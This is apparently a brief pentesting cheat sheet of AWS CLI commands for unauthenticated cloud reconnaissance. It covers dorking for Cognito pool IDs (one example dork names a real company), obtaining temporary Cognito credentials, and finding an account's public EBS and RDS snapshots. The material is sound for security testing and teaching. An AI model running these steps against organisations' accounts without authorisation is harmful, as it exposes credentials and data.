Cognito

Find Cognito Identity Pool ID from the customer site or via github (example for a dork: /us-east-1:[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/ walmart)

Use the pool ID to get the identitiy ID:

aws cognito-identity get-id --identity-pool-id <identity-pool-id> --region <region>

Use the identity ID to get credentials:

aws cognito-identity get-credentials-for-identity --identity-id <identity-id-from-previous-command> --region <region>

Resources:

https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

Find AWS ID via Open bucket

https://hackingthe.cloud/aws/enumeration/account_id_from_s3_bucket/https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/https://github.com/fwdcloudsec/known_aws_accounts

Find EBS images

Using the AWS ID find Public EBS images:

aws ec2 describe-snapshots --restorable-by-user-ids all --owner-ids XXXXXXXXXXXX

Find public RDS

aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, 284546856933:) == true]'

Resource: https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum#public-rds-snapshots